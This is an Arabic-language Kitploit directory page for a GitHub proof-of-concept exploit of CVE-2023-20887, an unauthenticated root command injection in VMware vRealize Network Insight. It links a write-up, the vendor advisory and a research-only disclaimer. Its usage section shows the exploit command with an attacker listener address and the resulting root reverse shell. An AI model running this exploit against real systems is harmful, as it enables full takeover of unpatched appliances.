Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
CVE-2023-20887 — VMWare vRealize Network Insight ثغرة RCE قبل المصادقة (CVE-2023-20887) | Kitploit
أدوات/GitHubGitHub/malwareman007/cve-2023-20887
تحليل الثغرات الأمنيةالاستغلالاستغلال تطبيقات الويباختبار الاختراقالقيادة والسيطرةالفريق الأحمر
GitHubmalwareman007/cve-2023-20887

CVE-2023-20887

VMWare vRealize Network Insight ثغرة RCE قبل المصادقة (CVE-2023-20887)

عرض المستودع
81منذ 2 سنواتلم تتم المراجعة بعد

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة
الموقع الإلكتروني

CVE-2023-20887

POC لـ CVE-2023-20887 VMWare Aria Operations for Networks (vRealize Network Insight) استغلال تنفيذ برمجيات عن بُعد غير مصادق عليه

التحليل الفني

يمكن العثور على تحليل السبب الجذري للثغرة في مدونتي: https://kushagraojha.medium.com/vmware-vrealize-network-insight-cve-2023-20887-193f3c3d30a0

الملخص

VMWare Aria Operations for Networks (vRealize Network Insight) معرضة لحقن الأوامر عند قبول إدخال المستخدم عبر واجهة Apache Thrift RPC. تسمح هذه الثغرة لمهاجم عن بُعد غير مصادق عليه بتنفيذ أوامر عشوائية على نظام التشغيل الأساسي بصلاحيات مستخدم root. واجهة RPC محمية بواسطة وكيل عكسي يمكن تجاوزه. قيّمت VMware خطورة هذه المشكلة ضمن نطاق حرج (Critical) بحد أقصى للدرجة الأساسية CVSSv3 يبلغ 9.8. يمكن للجهة الخبيثة الحصول على تنفيذ برمجيات عن بُعد في سياق المستخدم 'root' على الجهاز. إصدارات VMware 6.x معرضة للخطر.

الاستخدام

root@kitploit:~
python CVE-2023-20887.py --url https://192.168.116.100 --attacker 192.168.116.1:1337
(*) Starting handler
(+) Received connection from 192.168.116.100
(+) pop thy shell! (it's ready)
sudo bash
id
uid=0(root) gid=0(root) groups=0(root)
hostname
vrni-platform-release

التخفيف

قم بالتحديث إلى أحدث إصدار أو خفّف الأثر باتباع التعليمات الواردة في نشرة Progress Advisory

  • https://www.vmware.com/security/advisories/VMSA-2023-0012.html

إخلاء المسؤولية

تم إنشاء هذا البرنامج لأغراض البحث الأكاديمي وتطوير تقنيات دفاعية فعّالة فقط، وليس المقصود استخدامه لمهاجمة الأنظمة إلا في الحالات المصرّح بها صراحةً. القائمون على المشروع غير مسؤولين عن سوء استخدام البرنامج. استخدمه بمسؤولية.

تنزيل الأداة